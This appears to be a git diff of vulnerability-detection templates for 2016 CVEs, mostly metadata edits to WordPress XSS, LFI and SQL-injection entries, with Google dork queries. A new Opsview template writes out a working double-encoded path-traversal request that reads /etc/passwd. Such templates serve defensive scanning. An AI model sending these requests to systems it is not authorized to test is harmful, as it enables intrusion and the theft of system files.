- http://www.vapidlabs.com/wp/wp_advisory.php?v=658
+ - https://wordpress.org/plugins/hero-maps-pro
+ - http://web.archive.org/web/20210123183224/https://www.securityfocus.com/bid/93815/
+ - https://nvd.nist.gov/vuln/detail/CVE-2016-1000137
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@@ -34,3 +37,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2016/CVE-2016-1000138.yaml b/cves/2016/CVE-2016-1000138.yaml
index 5b988c640b..3d1b416c23 100644
--- a/cves/2016/CVE-2016-1000138.yaml
+++ b/cves/2016/CVE-2016-1000138.yaml
@@ -1,17 +1,22 @@
id: CVE-2016-1000138
info:
- name: Admin Font Editor <= 1.8 - Reflected Cross-Site Scripting (XSS)
+ name: WordPress Admin Font Editor <=1.8 - Cross-Site Scripting
author: daffainfo
severity: medium
- description: Reflected XSS in wordpress plugin indexisto v1.0.5
+ description: WordPress Admin Font Editor plugin indexisto 1.8 and before contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- http://www.vapidlabs.com/wp/wp_advisory.php?v=38
+ - https://wordpress.org/plugins/indexisto
+ - http://web.archive.org/web/20210622181116/
+ - https://nvd.nist.gov/vuln/detail/CVE-2016-1000138
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2016-1000138
cwe-id: CWE-79
+ metadata:
+ google-query: inurl:"/wp-content/plugins/indexisto"
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
@@ -34,3 +39,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2016/CVE-2016-1000139.yaml b/cves/2016/CVE-2016-1000139.yaml
index dd26243a2c..f12cd70647 100644
--- a/cves/2016/CVE-2016-1000139.yaml
+++ b/cves/2016/CVE-2016-1000139.yaml
@@ -1,19 +1,23 @@
id: CVE-2016-1000139
info:
- name: Infusionsoft Gravity Forms Add-on <= 1.5.11 - XSS
+ name: WordPress Infusionsoft Gravity Forms <=1.5.11 - Cross-Site Scripting
author: daffainfo
severity: medium
- description: Reflected XSS in wordpress plugin infusionsoft v1.5.11
+ description: WordPress plugin Infusionsoft 1.5.11 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://wpscan.com/vulnerability/0a60039b-a08a-4f51-a540-59f397dceb6a
+ - https://wordpress.org/plugins/infusionsoft
+ - http://www.vapidlabs.com/wp/wp_advisory.php?v=864
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000139
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2016-1000139
cwe-id: CWE-79
- tags: cve,cve2016,wordpress,wp-plugin,xss
+ metadata:
+ google-query: inurl:"/wp-content/plugins/infusionsoft"
+ tags: cve,cve2016,wordpress,wp-plugin,xss,wpscan
requests:
- method: GET
@@ -37,3 +41,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2016/CVE-2016-1000140.yaml b/cves/2016/CVE-2016-1000140.yaml
index a9fad16d82..4c24bebc9d 100644
--- a/cves/2016/CVE-2016-1000140.yaml
+++ b/cves/2016/CVE-2016-1000140.yaml
@@ -1,11 +1,14 @@
id: CVE-2016-1000140
info:
- name: New Year Firework <= 1.1.9 - Reflected Cross-Site Scripting (XSS)
+ name: WordPress New Year Firework <=1.1.9 - Cross-Site Scripting
author: daffainfo
severity: medium
- description: Reflected XSS in wordpress plugin new-year-firework v1.1.9
+ description: WordPress New Year Firework 1.1.9 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
+ - http://www.vapidlabs.com/wp/wp_advisory.php?v=453
+ - https://wordpress.org/plugins/new-year-firework
+ - http://web.archive.org/web/20210123183230/https://www.securityfocus.com/bid/93817/
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000140
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@@ -34,3 +37,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2016/CVE-2016-1000141.yaml b/cves/2016/CVE-2016-1000141.yaml
index 5a145c55c7..27b9bd4027 100644
--- a/cves/2016/CVE-2016-1000141.yaml
+++ b/cves/2016/CVE-2016-1000141.yaml
@@ -1,19 +1,22 @@
id: CVE-2016-1000141
info:
- name: WordPress Page Layout builder v1.9.3 - Reflected Cross-Site Scripting
+ name: WordPress Page Layout builder v1.9.3 - Cross-Site Scripting
author: daffainfo
severity: medium
description: WordPress plugin Page-layout-builder v1.9.3 contains a cross-site scripting vulnerability.
reference:
- http://www.vapidlabs.com/wp/wp_advisory.php?v=358
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000141
+ - https://wordpress.org/plugins/page-layout-builder
+ remediation: Upgrade to version 2.0 or higher.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2016-1000141
cwe-id: CWE-79
- remediation: Upgrade to version 2.0 or higher.
+ metadata:
+ google-query: inurl:"/wp-content/plugins/page-layout-builder"
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
diff --git a/cves/2016/CVE-2016-1000142.yaml b/cves/2016/CVE-2016-1000142.yaml
index c1aa662652..b0c809b337 100644
--- a/cves/2016/CVE-2016-1000142.yaml
+++ b/cves/2016/CVE-2016-1000142.yaml
@@ -1,19 +1,21 @@
id: CVE-2016-1000142
info:
- name: MW Font Changer <= 4.2.5 - Unauthenticated Reflected Cross-Site Scripting (XSS)
+ name: WordPress MW Font Changer <=4.2.5 - Cross-Site Scripting
author: daffainfo
severity: medium
- description: The MW Font Changer WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability.
+ description: WordPress MW Font Changer plugin 4.2.5 and before contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://wpscan.com/vulnerability/4ff5d65a-ba61-439d-ab7f-745a0648fccc
+ - http://www.vapidlabs.com/wp/wp_advisory.php?v=435
+ - https://wordpress.org/plugins/parsi-font
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000142
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2016-1000142
cwe-id: CWE-79
- tags: cve,cve2016,wordpress,wp-plugin,xss
+ tags: cve2016,wordpress,wp-plugin,xss,wpscan,cve
requests:
- method: GET
@@ -35,3 +37,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2016/CVE-2016-1000143.yaml b/cves/2016/CVE-2016-1000143.yaml
index d67e4f9833..090c6d4c73 100644
--- a/cves/2016/CVE-2016-1000143.yaml
+++ b/cves/2016/CVE-2016-1000143.yaml
@@ -1,12 +1,13 @@
id: CVE-2016-1000143
info:
- name: Photoxhibit v2.1.8 - Unauthenticated Reflected Cross-Site Scripting (XSS)
+ name: WordPress Photoxhibit 2.1.8 - Cross-Site Scripting
author: daffainfo
severity: medium
- description: Reflected XSS in wordpress plugin photoxhibit v2.1.8
+ description: WordPress Photoxhibit 2.1.8 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- http://www.vapidlabs.com/wp/wp_advisory.php?v=780
+ - https://wordpress.org/plugins/photoxhibit
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000143
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@@ -35,3 +36,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2016/CVE-2016-1000146.yaml b/cves/2016/CVE-2016-1000146.yaml
index ba02431c6f..3775d4f585 100644
--- a/cves/2016/CVE-2016-1000146.yaml
+++ b/cves/2016/CVE-2016-1000146.yaml
@@ -1,11 +1,14 @@
id: CVE-2016-1000146
info:
- name: Pondol Form to Mail <= 1.1 - Reflected Cross-Site Scripting (XSS)
+ name: WordPress Pondol Form to Mail <=1.1 - Cross-Site Scripting
author: daffainfo
severity: medium
- description: Reflected XSS in wordpress plugin pondol-formmail v1.1
+ description: WordPress Pondol Form to Mail 1.1 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
+ - http://www.vapidlabs.com/wp/wp_advisory.php?v=787
+ - https://wordpress.org/plugins/pondol-formmail
+ - http://web.archive.org/web/20210615122859/https://www.securityfocus.com/bid/93584
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000146
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@@ -34,3 +37,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2016/CVE-2016-1000148.yaml b/cves/2016/CVE-2016-1000148.yaml
index d084222ec3..fe1ef6ac43 100644
--- a/cves/2016/CVE-2016-1000148.yaml
+++ b/cves/2016/CVE-2016-1000148.yaml
@@ -1,19 +1,21 @@
id: CVE-2016-1000148
info:
- name: S3 Video Plugin <= 0.983 - Unauthenticated Reflected Cross-Site Scripting (XSS)
+ name: WordPress S3 Video <=0.983 - Cross-Site Scripting
author: daffainfo
severity: medium
- description: Reflected XSS in wordpress plugin s3-video v0.983
+ description: WordPress S3 Video and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://wpscan.com/vulnerability/ead796ed-202a-451f-b041-d39c9cf1fb54
+ - https://wordpress.org/plugins/s3-video
+ - http://www.vapidlabs.com/wp/wp_advisory.php?v=240
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000148
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2016-1000148
cwe-id: CWE-79
- tags: cve,cve2016,wordpress,wp-plugin,xss
+ tags: cve,cve2016,wordpress,wp-plugin,xss,wpscan
requests:
- method: GET
@@ -35,3 +37,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2016/CVE-2016-1000149.yaml b/cves/2016/CVE-2016-1000149.yaml
index b6f8c9e451..9609e2b630 100644
--- a/cves/2016/CVE-2016-1000149.yaml
+++ b/cves/2016/CVE-2016-1000149.yaml
@@ -1,11 +1,14 @@
id: CVE-2016-1000149
info:
- name: Simpel Reserveren 3 <= 3.5.2 - Reflected Cross-Site Scripting (XSS)
+ name: WordPress Simpel Reserveren <=3.5.2 - Cross-Site Scripting
author: daffainfo
severity: medium
- description: Reflected XSS in wordpress plugin simpel-reserveren v3.5.2
+ description: WordPress plugin Simpel Reserveren 3.5.2 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
+ - https://wordpress.org/plugins/simpel-reserveren
+ - http://www.vapidlabs.com/wp/wp_advisory.php?v=474
+ - http://web.archive.org/web/20210125181834/https://www.securityfocus.com/bid/93582/
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000149
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@@ -34,3 +37,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2016/CVE-2016-1000152.yaml b/cves/2016/CVE-2016-1000152.yaml
index 81564defed..3b6e131fe0 100644
--- a/cves/2016/CVE-2016-1000152.yaml
+++ b/cves/2016/CVE-2016-1000152.yaml
@@ -1,11 +1,14 @@
id: CVE-2016-1000152
info:
- name: Tidio-form <= 1.0 - Reflected Cross-Site Scripting (XSS)
+ name: WordPress Tidio-form <=1.0 - Cross-Site Scripting
author: daffainfo
severity: medium
- description: Reflected XSS in wordpress plugin tidio-form v1.0
+ description: WordPress tidio-form1.0 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
+ - http://www.vapidlabs.com/wp/wp_advisory.php?v=799
+ - https://wordpress.org/plugins/tidio-form
+ - http://web.archive.org/web/20210125181732/https://www.securityfocus.com/bid/93579/
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000152
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@@ -34,3 +37,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2016/CVE-2016-1000153.yaml b/cves/2016/CVE-2016-1000153.yaml
index dd76ca2ab8..bca2722d4f 100644
--- a/cves/2016/CVE-2016-1000153.yaml
+++ b/cves/2016/CVE-2016-1000153.yaml
@@ -1,12 +1,15 @@
id: CVE-2016-1000153
info:
- name: Tidio Gallery <= 1.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
+ name: WordPress Tidio Gallery <=1.1 - Cross-Site Scripting
author: daffainfo
severity: medium
- description: Reflected XSS in wordpress plugin tidio-gallery v1.1
+ description: WordPress plugin tidio-gallery v1.1 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000153
+ - http://www.vapidlabs.com/wp/wp_advisory.php?v=427
+ - https://wordpress.org/plugins/tidio-gallery
+ - http://web.archive.org/web/20210123180207/https://www.securityfocus.com/bid/93543/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@@ -34,3 +37,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2016/CVE-2016-1000154.yaml b/cves/2016/CVE-2016-1000154.yaml
index f1807d5b58..95e8c20fee 100644
--- a/cves/2016/CVE-2016-1000154.yaml
+++ b/cves/2016/CVE-2016-1000154.yaml
@@ -1,11 +1,14 @@
id: CVE-2016-1000154
info:
- name: WHIZZ <= 1.0.7 - Reflected Cross-Site Scripting (XSS)
+ name: WordPress WHIZZ <=1.0.7 - Cross-Site Scripting
author: daffainfo
severity: medium
- description: Reflected XSS in wordpress plugin whizz v1.0.
+ description: WordPress plugin WHIZZ 1.07 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
+ - http://www.vapidlabs.com/wp/wp_advisory.php?v=112
+ - https://wordpress.org/plugins/whizz
+ - http://web.archive.org/web/20210123180140/https://www.securityfocus.com/bid/93538/
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000154
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@@ -34,3 +37,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2016/CVE-2016-1000155.yaml b/cves/2016/CVE-2016-1000155.yaml
index dacd84369d..8b7490465c 100644
--- a/cves/2016/CVE-2016-1000155.yaml
+++ b/cves/2016/CVE-2016-1000155.yaml
@@ -1,11 +1,14 @@
id: CVE-2016-1000155
info:
- name: WPSOLR <= 8.6 - Unauthenticated Reflected Cross-Site Scripting (XSS)
+ name: WordPress WPSOLR <=8.6 - Cross-Site Scripting
author: daffainfo
severity: medium
- description: Reflected XSS in wordpress plugin wpsolr-search-engine v7.6
+ description: WordPress WPSOLR 8.6 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
+ - https://wordpress.org/plugins/wpsolr-search-engine
+ - http://www.vapidlabs.com/wp/wp_advisory.php?v=303
+ - http://web.archive.org/web/20210123180137/https://www.securityfocus.com/bid/93536/
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000155
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@@ -34,3 +37,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2016/CVE-2016-10033.yaml b/cves/2016/CVE-2016-10033.yaml
index 6ada2e758e..6f283957ea 100644
--- a/cves/2016/CVE-2016-10033.yaml
+++ b/cves/2016/CVE-2016-10033.yaml
@@ -8,12 +8,14 @@ info:
reference:
- https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html
- https://nvd.nist.gov/vuln/detail/CVE-2016-10033
+ - https://www.exploit-db.com/exploits/40970/
+ - https://www.exploit-db.com/exploits/40968/
classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2016-10033
cwe-id: CWE-77
- tags: wordpress,cve,cve2016,rce
+ tags: cve,cve2016,rce,edb,wordpress
requests:
- raw:
diff --git a/cves/2016/CVE-2016-10134.yaml b/cves/2016/CVE-2016-10134.yaml
index 02d81b2500..38b1ab2065 100644
--- a/cves/2016/CVE-2016-10134.yaml
+++ b/cves/2016/CVE-2016-10134.yaml
@@ -4,16 +4,18 @@ info:
name: Zabbix - SQL Injection
author: princechaddha
severity: critical
- description: "Zabbix before 2.2.14 and 3.0 before 3.0.4 allows remote attackers to execute arbitrary SQL commands via the toggle_ids array parameter in latest.php and perform SQL injection attacks."
+ description: Zabbix before 2.2.14 and 3.0 before 3.0.4 allows remote attackers to execute arbitrary SQL commands via the toggle_ids array parameter in latest.php and perform SQL injection attacks.
reference:
- https://github.com/vulhub/vulhub/tree/master/zabbix/CVE-2016-10134
- https://nvd.nist.gov/vuln/detail/CVE-2016-10134
+ - https://support.zabbix.com/browse/ZBX-11023
+ - https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=850936
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2016-10134
cwe-id: CWE-89
- tags: cve,cve2016,zabbix,sqli
+ tags: cve,cve2016,zabbix,sqli,vulhub
requests:
- method: GET
diff --git a/cves/2016/CVE-2016-10367.yaml b/cves/2016/CVE-2016-10367.yaml
new file mode 100644
index 0000000000..8e41296b51
--- /dev/null
+++ b/cves/2016/CVE-2016-10367.yaml
@@ -0,0 +1,38 @@
+id: CVE-2016-10367
+
+info:
+ name: Opsview Monitor Pro - Local File Inclusion
+ author: 0x_akoko
+ severity: high
+ description: Opsview Monitor Pro prior to 5.1.0.162300841, prior to 5.0.2.27475, prior to 4.6.4.162391051, and 4.5.x without a certain 2016 security patch is vulnerable to unauthenticated local file inclusion and can be exploited by issuing a specially crafted HTTP GET request utilizing a simple bypass.
+ reference:
+ - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18774
+ - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-016/?fid=8341
+ - https://nvd.nist.gov/vuln/detail/CVE-2016-10367
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2016-10367
+ cwe-id: CWE-22
+ metadata:
+ shodan-query: title:"Opsview"
+ verified: "true"
+ tags: cve,cve2016,opsview,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/monitoring/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+
+ - type: status
+ status:
+ - 404
+
+# Enhanced by mp on 2022/08/03
diff --git a/cves/2016/CVE-2016-10924.yaml b/cves/2016/CVE-2016-10924.yaml
index 1806dc1462..92b0c3f941 100644
--- a/cves/2016/CVE-2016-10924.yaml
+++ b/cves/2016/CVE-2016-10924.yaml
@@ -1,20 +1,24 @@
id: CVE-2016-10924
info:
- name: Wordpress eBook Download < 1.2 - Directory Traversal
+ name: Wordpress Zedna eBook download <1.2 - Local File Inclusion
author: idealphase
severity: high
- description: The Wordpress eBook Download plugin was affected by a filedownload.php Local File Inclusion security vulnerability.
+ description: |
+ Wordpress Zedna eBook download prior to version 1.2 was affected by a filedownload.php local file inclusion vulnerability.
reference:
- https://wpscan.com/vulnerability/13d5d17a-00a8-441e-bda1-2fd2b4158a6c
- https://www.exploit-db.com/exploits/39575
- https://nvd.nist.gov/vuln/detail/CVE-2016-10924
+ - https://wordpress.org/plugins/ebook-download/#developers
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2016-10924
cwe-id: CWE-22
- tags: cve,cve2021,wp-plugin,lfi,wordpress,ebook
+ metadata:
+ google-query: inurl:"/wp-content/plugins/ebook-download"
+ tags: cve,wordpress,edb,cve2016,wp-plugin,lfi,ebook,wp,wpscan
requests:
- method: GET
@@ -33,3 +37,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/06/17
diff --git a/cves/2016/CVE-2016-10940.yaml b/cves/2016/CVE-2016-10940.yaml
index 6219d78a06..d082888437 100644
--- a/cves/2016/CVE-2016-10940.yaml
+++ b/cves/2016/CVE-2016-10940.yaml
@@ -9,12 +9,13 @@ info:
- https://wpscan.com/vulnerability/c0cbd314-0f4f-47db-911d-9b2e974bd0f6
- https://lenonleite.com.br/en/2016/12/16/zm-gallery-1-plugin-wordpress-blind-injection/
- https://nvd.nist.gov/vuln/detail/CVE-2016-10940
+ - http://lenonleite.com.br/en/2016/12/16/zm-gallery-1-plugin-wordpress-blind-injection/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2016-10940
cwe-id: CWE-89
- tags: cve,cve2016,sqli,wp,wordpress,wp-plugin,authenticated
+ tags: wpscan,cve,cve2016,sqli,wp,wordpress,wp-plugin,authenticated
requests:
- raw:
diff --git a/cves/2016/CVE-2016-10956.yaml b/cves/2016/CVE-2016-10956.yaml
index a62f026497..7890fd0914 100644
--- a/cves/2016/CVE-2016-10956.yaml
+++ b/cves/2016/CVE-2016-10956.yaml
@@ -1,18 +1,22 @@
id: CVE-2016-10956
info:
- name: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI)
+ name: WordPress Mail Masta 1.0 - Local File Inclusion
author: daffainfo,0x240x23elu
severity: high
- description: The mail-masta plugin 1.0 for WordPress has local file inclusion in count_of_send.php and csvexport.php.
+ description: WordPress Mail Masta 1.0 is susceptible to local file inclusion in count_of_send.php and csvexport.php.
reference:
- https://cxsecurity.com/issue/WLB-2016080220
- https://wpvulndb.com/vulnerabilities/8609
+ - https://wordpress.org/plugins/mail-masta/#developers
+ - https://nvd.nist.gov/vuln/detail/CVE-2016-10956
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2016-10956
cwe-id: CWE-20
+ metadata:
+ google-query: inurl:"/wp-content/plugins/mail-masta"
tags: cve,cve2016,wordpress,wp-plugin,lfi,mail
requests:
@@ -31,3 +35,5 @@ requests:
status:
- 200
- 500
+
+# Enhanced by mp on 2022/06/09
diff --git a/cves/2016/CVE-2016-10960.yaml b/cves/2016/CVE-2016-10960.yaml
index e913b6b307..b448f10340 100644
--- a/cves/2016/CVE-2016-10960.yaml
+++ b/cves/2016/CVE-2016-10960.yaml
@@ -9,11 +9,14 @@ info:
- https://www.pluginvulnerabilities.com/2016/07/12/remote-code-execution-rce-vulnerability-in-wsecure-lite/
- https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wsecure-lite-remote-code-execution-2-3/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960
+ - https://wordpress.org/plugins/wsecure/#developers
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2016-10960
cwe-id: CWE-20
+ metadata:
+ google-query: inurl:"/wp-content/plugins/wsecure"
tags: cve,cve2016,wordpress,wp-plugin,rce
requests:
diff --git a/cves/2016/CVE-2016-10993.yaml b/cves/2016/CVE-2016-10993.yaml
index 3113cba0d2..6ad4301ebf 100644
--- a/cves/2016/CVE-2016-10993.yaml
+++ b/cves/2016/CVE-2016-10993.yaml
@@ -1,12 +1,13 @@
id: CVE-2016-10993
info:
- name: ScoreMe Theme - Unauthenticated Reflected Cross-Site Scripting (XSS)
+ name: ScoreMe Theme - Cross-Site Scripting
author: daffainfo
severity: medium
- description: The ScoreMe theme through 2016-04-01 for WordPress has XSS via the s parameter.
+ description: WordPress ScoreMe theme through 2016-04-01 contains a reflected cross-site scripting vulnerability via the s parameter which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://www.vulnerability-lab.com/get_content.php?id=1808
+ - https://wpvulndb.com/vulnerabilities/8431
- https://nvd.nist.gov/vuln/detail/CVE-2016-10993
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
@@ -35,3 +36,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2016/CVE-2016-1555.yaml b/cves/2016/CVE-2016-1555.yaml
index fc3e8a3a38..a5a30ece6a 100644
--- a/cves/2016/CVE-2016-1555.yaml
+++ b/cves/2016/CVE-2016-1555.yaml
@@ -8,12 +8,14 @@ info:
reference:
- https://github.com/nobodyatall648/Netgear-WNAP320-Firmware-Version-2.0.3-RCE
- https://nvd.nist.gov/vuln/detail/CVE-2016-1555
+ - https://kb.netgear.com/30480/CVE-2016-1555-Notification?cid=wmt_netgear_organic
+ - http://seclists.org/fulldisclosure/2016/Feb/112
classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
- cvss-score: 10.0
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
cve-id: CVE-2016-1555
cwe-id: CWE-77
- tags: netgear,rce,oast,router
+ tags: netgear,rce,oast,router,kev,seclists,cve,cve2016
requests:
- raw:
diff --git a/cves/2016/CVE-2016-2004.yaml b/cves/2016/CVE-2016-2004.yaml
index 7f654b71ee..15ec090ed2 100644
--- a/cves/2016/CVE-2016-2004.yaml
+++ b/cves/2016/CVE-2016-2004.yaml
@@ -8,12 +8,14 @@ info:
reference:
- https://www.exploit-db.com/exploits/39858
- https://nvd.nist.gov/vuln/detail/CVE-2016-2004
+ - http://www.kb.cert.org/vuls/id/267328
+ - https://www.exploit-db.com/exploits/39858/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2016-2004
cwe-id: CWE-306
- tags: cve,cve2016,network,iot,hp,rce
+ tags: cve,cve2016,network,iot,hp,rce,edb
network:
- inputs:
diff --git a/cves/2016/CVE-2016-2389.yaml b/cves/2016/CVE-2016-2389.yaml
index 4a6b80e158..746f28abb2 100644
--- a/cves/2016/CVE-2016-2389.yaml
+++ b/cves/2016/CVE-2016-2389.yaml
@@ -1,19 +1,23 @@
id: CVE-2016-2389
info:
- name: SAP xMII 15.0 - Directory Traversal
+ name: SAP xMII 15.0 for SAP NetWeaver 7.4 - Local File Inclusion
author: daffainfo
severity: high
- description: Directory traversal vulnerability in the GetFileList function in the SAP Manufacturing Integration and Intelligence (xMII) component 15.0 for SAP NetWeaver 7.4 allows remote attackers to read arbitrary files via a .. (dot dot) in the Path parameter to /Catalog, aka SAP Security Note 2230978.
+ description: SAP xMII 15.0 for SAP NetWeaver 7.4 is susceptible to a local file inclusion vulnerability in the GetFileList function. This can allow remote attackers to read arbitrary files via a .. (dot dot) in the path parameter to /Catalog, aka SAP Security Note 2230978.
reference:
- https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/
- - https://www.cvedetails.com/cve/CVE-2016-2389
+ - http://packetstormsecurity.com/files/137046/SAP-MII-15.0-Directory-Traversal.html
